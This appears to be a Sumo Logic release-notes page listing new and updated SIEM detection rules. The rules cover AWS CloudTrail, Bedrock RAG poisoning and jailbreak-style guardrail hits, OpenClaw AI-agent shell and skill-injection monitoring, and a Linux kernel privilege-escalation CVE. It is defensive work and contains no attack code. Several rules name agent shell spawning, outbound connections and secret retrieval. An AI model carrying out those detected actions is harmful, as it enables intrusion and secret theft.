Skip to main content

June 12th, 2026 - Content Release

  • This content release includes:
    • Removed redundant field mappings for AWS CloudTrail and updated 40+ AWS CloudTrail rules. srcDevice_ip and device_ip are no longer mapped from the same source field. While out-of-the-box rules have been updated, custom rules that solely reference device_ip as an entity may require adjustments to be properly fed by the updated mappings.
    • 5 new AWS Bedrock security rules detecting RAG poisoning via external S3 data sources, knowledge base mass deletion, IAM privilege escalation targeting Bedrock services, and rapid guardrail intervention attempts indicating jailbreak activity
    • 4 new OpenClaw AI agent monitoring rules providing visibility into shell execution, out-of-band skill injection, child process outbound connections, and unsanctioned installations via network activity
    • 2 new Linux privilege escalation rules detecting exploitation of CVE-2026-31431 (CopyFail), a high-severity kernel vulnerability in the cryptographic subsystem that enables root access
    • Improved entity correlation across 40+ AWS CloudTrail rules through standardized device and source device field mappings
    • New Fortinet authentication log mapping with parser enhancements, and improved user agent extraction for Microsoft Office 365 authentication events
    • Changes are enumerated below

Rules

  • [New] MATCH-S01153 AF_ALG Socket Opened by Unprivileged Process
    • A unprivileged process on a Linux host opened a socket using the kernel cryptographic API subsystem
  • [New] CHAIN-S00027 OpenClaw - Outbound Connection from Child Process
    • This ordered chain rule triggers when a child process of an openclaw-gateway node process is created on a host followed within 5 minutes by an outbound network connection to an external IP from the same process on the same host, grouped by process ID and hostname. Command lines associated with ip neighbor discovery are excluded as these can be a normal part of OpenClaw operation.
  • [New] MATCH-S01149 OpenClaw - Shell Launch by Gateway
    • This rule triggers when a Node.js process with 'openclaw' in its command line spawns shell interpreters such bash, zsh, sh, PowerShell or python. It monitors process creation events to identify when OpenClaw's shell integration features actively execute system commands. Command lines associated with ip neighbor discovery are excluded as these can be a normal part of OpenClaw operation.
  • [New] MATCH-S01152 OpenClaw - Skill Installed Out-of-Band
    • This rule triggers when a file matching .openclawskills*.md is created by a process whose base image is not "node" (the standard OpenClaw runtime). It monitors Sysmon FileCreate events and flags skill file writes that occur outside the official openclaw or clawhub installer processes.
  • [New] MATCH-S01150 OpenClaw - Activity on Default Port
    • This rule triggers when a websocket connection to TCP port 18789 returns HTTP status 'Switching Protocols', indicating websocket handshake. Port 18789 is OpenClaw's default local server port, providing detection of active OpenClaw usage.
  • [New] FIRST-S00101 AWS Bedrock - KB Data Source from External S3 Bucket
    • Detection: This rule triggers when an S3 bucket from an external AWS account is added to a Bedrock Knowledge Base via UpdateDataSource or CreateDataSource API calls in which the external AWS account hasn't been observed in the last 90 days.
  • [New] THRESHOLD-S00125 AWS Bedrock - Knowledge Base Mass Deletion
    • This rule triggers when a user deletes multiple AWS Bedrock Knowledge Bases within a short time period from the same source IP address. It monitors CloudTrail logs for successful DeleteKnowledgeBase API calls and excludes AWS service-linked roles.
  • [New] MATCH-S01151 AWS Bedrock - Privileged Permissions Granted
    • This rule triggers when Bedrock IAM permissions are granted through: (1) attachment of managed policies (AmazonBedrockFullAccess, AmazonBedrockStudioFullAccess), (2) creation of policies containing Bedrock actions, or (3) inline policy assignments. It monitors high-risk actions including model invocation, AI agent creation, guardrail deletion, logging configuration changes, knowledge base creation, and provisioned throughput allocation.
  • [New] CHAIN-S00026 AWS Bedrock - Privileged Policy Created and Attached
    • This rule triggers when Bedrock IAM permissions are granted through the creation and attachment of an IAM policy with privileged Bedrock permissions including model invocation, AI agent creation, guardrail deletion, logging configuration changes, knowledge base creation, and provisioned throughput allocation.
  • [New] THRESHOLD-S00124 AWS Bedrock - Rapid Guardrail Interventions
    • This rule triggers when 10 or more Bedrock Guardrail interventions occur within 60 seconds for a user. It monitors CloudWatch logs where stopReason equals 'guardrail_intervened', indicating the guardrail blocked model responses that violated content policies.
  • [New] MATCH-S01154 Unexpected Root Process from Unprivileged Login Session
    • A user executed a program as root on a Linux host while the originating login session belongs to an unprivileged user, which is inconsistent with legitimate privilege escalation workflows.
  • [Updated] MATCH-S00307 AWS - Excessive OAuth Application Permissions Scope
  • [Updated] MATCH-S00306 AWS - New UserPoolClient Created
  • [Updated] MATCH-S00921 AWS Bedrock Model Invocation Logging Configuration Change Observed
  • [Updated] MATCH-S00715 AWS Cloud Storage Deletion
  • [Updated] AGGREGATION-S00002 AWS CloudTrail - Aggressive Reconnaissance
  • [Updated] LEGACY-S00207 AWS CloudTrail - Customer Master Key Disabled or Scheduled for Deletion
  • [Updated] MATCH-S00261 AWS CloudTrail - Database Snapshot Created
  • [Updated] MATCH-S00208 AWS CloudTrail - EC2 Access Key Action Detected
  • [Updated] MATCH-S00246 AWS CloudTrail - GetSecretValue from non Amazon IP
  • [Updated] MATCH-S00111 AWS CloudTrail - IAM CreateUser Action Observed
  • [Updated] LEGACY-S00206 AWS CloudTrail - IAM Policy Applied
  • [Updated] MATCH-S00101 AWS CloudTrail - IAM Privileged Policy Applied to Group
  • [Updated] MATCH-S00104 AWS CloudTrail - IAM Privileged Policy Applied to Role
  • [Updated] MATCH-S00099 AWS CloudTrail - IAM Privileged Policy Applied to User
  • [Updated] THRESHOLD-S00051 AWS CloudTrail - IAM User Generating AccessDenied Errors Across Multiple Actions
  • [Updated] MATCH-S00113 AWS CloudTrail - Logging Configuration Change Observed
  • [Updated] MATCH-S00308 AWS CloudTrail - OpsWorks Describe Permissions Event
  • [Updated] MATCH-S00109 AWS CloudTrail - Permissions Boundary Lifted
  • [Updated] MATCH-S00105 AWS CloudTrail - Public S3 Bucket Exposed
  • [Updated] MATCH-S00213 AWS CloudTrail - Reconnaissance related event
  • [Updated] MATCH-S00096 AWS CloudTrail - Root Console Successful Login Observed
  • [Updated] MATCH-S00764 AWS CloudTrail - S3 Bucket Public Access Block Disabled
  • [Updated] MATCH-S00210 AWS CloudTrail - SQS List Queues Event
  • [Updated] MATCH-S00240 AWS CloudTrail - ScheduleKeyDeletion in KMS
  • [Updated] MATCH-S00247 AWS CloudTrail - Secrets Manager sensitive admin action observed
  • [Updated] MATCH-S00238 AWS CloudTrail - sensitive activity in KMS
  • [Updated] MATCH-S00540 AWS CloudTrail Network Access Control List Deleted
  • [Updated] MATCH-S00664 AWS CloudWatch Alarm Actions Disabled
  • [Updated] MATCH-S00663 AWS CloudWatch Alarm Deletion
  • [Updated] MATCH-S00662 AWS CloudWatch Anomaly Detector Deletion
  • [Updated] MATCH-S00665 AWS CloudWatch Log Group Deletion
  • [Updated] MATCH-S00661 AWS CloudWatch Log Stream Deletion
  • [Updated] MATCH-S00671 AWS Config Recorder Deletion
  • [Updated] MATCH-S00672 AWS Config Recorder Stopped
  • [Updated] MATCH-S00670 AWS Config Service Tampering
  • [Updated] MATCH-S00654 AWS ECS Cluster Deleted
  • [Updated] MATCH-S00716 AWS Image Creation
  • [Updated] MATCH-S00717 AWS Image Deletion
  • [Updated] THRESHOLD-S00106 AWS Image Discovery
  • [Updated] MATCH-S00718 AWS Image Modification
  • [Updated] MATCH-S00719 AWS Instance Creation
  • [Updated] MATCH-S00720 AWS Instance Deletion
  • [Updated] THRESHOLD-S00107 AWS Instance Discovery
  • [Updated] MATCH-S00721 AWS Instance Modification
  • [Updated] MATCH-S00679 AWS Route 53 Domain Registered
  • [Updated] THRESHOLD-S00093 AWS Route 53 Reconnaissance
  • [Updated] MATCH-S00677 AWS Route 53 Service Tampering
  • [Updated] MATCH-S00680 AWS Route 53 TestDNSAnswer
  • [Updated] MATCH-S00678 AWS Route 53 Traffic Policy Creation
  • [Updated] MATCH-S00674 AWS WAF Access Control List Updated
  • [Updated] THRESHOLD-S00092 AWS WAF Reconnaissance
  • [Updated] MATCH-S00676 AWS WAF Rule Group Updated
  • [Updated] MATCH-S00675 AWS WAF Rule Updated
  • [Updated] MATCH-S00673 AWS WAF Service Tampering
  • [Updated] MATCH-S00660 Anomalous AWS User Executed a Command on ECS Container
  • [Updated] MATCH-S00686 Base64 Decode in Command Line
  • [Updated] FIRST-S00085 First Seen Role Creating AWS Bedrock Agent
  • [Updated] MATCH-S00655 New Container Uploaded to AWS ECR
  • [Updated] MATCH-S00826 SSH Keys Added to EC2 Instance
  • [Updated] MATCH-S00281 Windows - PowerShell Process Discovery

Log Mappers

  • [New] Fortinet Authentication Logs
  • [Updated] CloudTrail - application-insights.amazonaws.com - ListApplications
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - Trail Change|Logging
  • [Updated] CloudTrail - cognito-idp.amazonaws.com - CreateUserPoolClient
  • [Updated] CloudTrail - controltower.amazonaws.com - CreateManagedAccount
  • [Updated] CloudTrail - ec2.amazonaws.com - All Network Events
  • [Updated] CloudTrail - ec2.amazonaws.com - BidEvictedEvent
  • [Updated] CloudTrail - ecr.amazonaws.com - PolicyExecutionEvent
  • [Updated] CloudTrail - ecs.amazonaws.com - AwsApiCall-ExecuteCommand
  • [Updated] CloudTrail - elasticfilesystem.amazonaws.com - NewClientConnection
  • [Updated] CloudTrail - iam.amazonaws.com - Policy Change
  • [Updated] CloudTrail - kms.amazonaws.com - DisableKey|ScheduleKeyDeletion
  • [Updated] CloudTrail - kms.amazonaws.com - RotateKey
  • [Updated] CloudTrail - lambda.amazonaws.com - Audit Change
  • [Updated] CloudTrail - lambda.amazonaws.com - DeleteEventSourceMapping|DeleteFunction
  • [Updated] CloudTrail - lambda.amazonaws.com - DeleteFunctionUrlConfig
  • [Updated] CloudTrail - lambda.amazonaws.com - GetFunction
  • [Updated] CloudTrail - lambda.amazonaws.com - GetLayerVersionPolicy
  • [Updated] CloudTrail - lambda.amazonaws.com - GetPolicy|GetLayerVersionPolicy
  • [Updated] CloudTrail - lambda.amazonaws.com - ListEventSourceMappings
  • [Updated] CloudTrail - lambda.amazonaws.com - ListFunctions
  • [Updated] CloudTrail - lambda.amazonaws.com - Resource Access
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteDestination|DeleteLogGroup|DeleteLogStream
  • [Updated] CloudTrail - organizations.amazonaws.com - CreateAccountResult
  • [Updated] CloudTrail - s3.amazonaws.com - Bucket Change
  • [Updated] CloudTrail - s3.amazonaws.com - GetBucketAcl
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationSucceeded|RotationStarted
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - SecretVersionDeletion
  • [Updated] CloudTrail - signin.amazonaws.com - All AwsConsoleSignIn events
  • [Updated] CloudTrail - sso.amazonaws.com - Federate|ListProfilesForApplication
  • [Updated] CloudTrail Batch get Partition
  • [Updated] CloudTrail Default Mapping
  • [Updated] Microsoft Office 365 Active Directory Authentication Events

Parsers

  • [Updated] /Parsers/System/Fortinet/Fortigate/Fortigate-Syslog
  • [Updated] /Parsers/System/Microsoft/Office 365
Status
Legal
Privacy Statement
Terms of Use
CA Privacy Notice

Copyright © 2026 by Sumo Logic, Inc.